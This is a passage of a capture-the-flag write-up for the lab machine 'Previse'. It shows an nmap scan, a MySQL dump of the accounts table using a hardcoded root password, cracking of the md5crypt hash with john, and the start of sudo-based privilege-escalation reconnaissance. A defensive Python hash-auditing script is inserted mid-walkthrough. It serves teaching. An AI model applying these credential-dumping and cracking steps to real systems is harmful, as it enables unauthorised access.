```
─# nmap -A -p- --min-rate=1000 -T4 10.10.11.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:03 PDT
Nmap scan report for 10.10.11.104
Host is up (0.52s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/12%OT=22%CT=1%CU=42757%PV=Y%DS=2%DC=T%G=Y%TM=66E3
OS:9E0F%P=aarch64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53A
OS:ST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   414.58 ms 10.10.16.1
2   587.74 ms 10.10.11.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.33 seconds
```
```
www-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'use previse;select * from accounts;'
mysql: [Warning] Using a password on the command line interface can be insecure.
id	username	password	created_at
1	m4lwhere	$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.	2021-05-27 18:18:36
2	admin	$1$🧂llol$G3KunFyMrVvsqYP1JpRi70	2024-09-13 02:06:23
```
We now have m4lwhere's salted password hash; the next step is to determine what type of hash it is.

The storage logic is in the accounts.php source: it uses PHP's crypt() function, and the `$1$` prefix means MD5-based crypt (md5crypt), so we pass that format to john:
```
john hash --wordlist=/home/kali/Desktop/rockyou.txt --format=md5crypt-long
```
This yields the password ilovecody112235!, which lets us log in as m4lwhere.

The first thing to do is `sudo -l`, which reveals a script we can run:
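From the defender's side, the same dump tells an auditor two things before any cracking happens: the `$1$` prefix marks md5crypt, a fast algorithm with a fixed 1000 iterations, and both rows carry the identical salt `🧂llol`, so the application is not generating a random salt per user. The following Python is an added example (not code from the writeup or from the Previse application) that parses crypt(3)-style Modular Crypt Format strings, reports the algorithm and salt, and flags weak algorithms and salt reuse. The two hashes are the page's own values; the identifier table follows the prefixes glibc/libxcrypt use, and the "weak" classification of md5crypt is the auditor's assessment.

```python
import re
from collections import Counter

# Rows as dumped from the accounts table above (page values, embedded here for an offline run).
ACCOUNTS = [
    (1, "m4lwhere", "$1$🧂llol$DQpmdvnb7EeuO6UaqRItf."),
    (2, "admin",    "$1$🧂llol$G3KunFyMrVvsqYP1JpRi70"),
]

# Modular Crypt Format identifiers as used by glibc crypt(3) / libxcrypt: id -> (name, weak?)
MCF_IDS = {
    "1":  ("md5crypt", True),      # fast, fixed 1000 rounds: treat as weak
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5":  ("sha256crypt", False),
    "6":  ("sha512crypt", False),
    "y":  ("yescrypt", False),
}

MCF_RE = re.compile(r"^\$(?P<id>[^$]+)\$(?P<rest>.+)$")


def identify_hash(h):
    """Return (algorithm, salt, weak) for a crypt(3)-style hash, or None if it is not MCF."""
    m = MCF_RE.match(h)
    if not m:
        return None                      # plaintext or a bare digest such as unsalted MD5 hex
    ident, rest = m.group("id"), m.group("rest")
    if ident not in MCF_IDS:
        return ("unknown", None, True)   # unrecognised scheme: flag for manual review
    algo, weak = MCF_IDS[ident]
    if ident in ("2a", "2b", "2y"):
        # bcrypt: $2b$<cost>$<22-char salt><31-char hash>
        _cost, body = rest.split("$", 1)
        salt = body[:22]
    else:
        # md5crypt / sha*crypt / yescrypt: [params$]salt$hash, so the salt is the field before the last
        fields = rest.split("$")
        salt = fields[-2] if len(fields) >= 2 else ""
    return (algo, salt, weak)


def audit(rows):
    """Return a list of (username, finding) tuples for weak algorithms and reused salts."""
    findings = []
    salts = Counter()
    for _id, user, h in rows:
        info = identify_hash(h)
        if info is None:
            findings.append((user, "not a crypt(3) hash (plaintext or unsalted digest?)"))
            continue
        algo, salt, weak = info
        if weak:
            findings.append((user, f"weak algorithm {algo}; migrate to yescrypt or bcrypt"))
        salts[salt] += 1
    for salt, n in salts.items():
        if n > 1:
            findings.append(("*", f"salt {salt!r} reused by {n} accounts; salts must be random per user"))
    return findings


if __name__ == "__main__":
    for user, msg in audit(ACCOUNTS):
        print(f"{user}: {msg}")
```

Run against the two rows above it reports md5crypt for both accounts plus one shared-salt finding. The salt check is the more telling one for an application audit: a fixed salt means equal passwords produce equal hashes, and one precomputation covers every account.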
```
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ ls -l /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun  6  2021 /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
```